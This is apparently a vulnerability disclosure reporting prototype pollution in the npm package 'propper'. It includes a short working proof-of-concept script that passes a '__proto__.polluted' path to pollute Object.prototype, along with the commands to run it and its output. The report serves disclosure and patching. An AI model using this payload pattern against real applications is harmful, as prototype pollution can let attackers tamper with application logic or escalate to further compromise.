Prototype Pollution in allain/propper
Valid
Reported on
Feb 13th 2021
Description
Prototype Pollution in propper
Proof of Concept
- Create the following PoC file:
// poc.js
var propper = require("propper")
var obj = {}
console.log("Before : " + {}.polluted);
propper(obj,"__proto__.polluted","Yes! Its Polluted");
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i propper # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation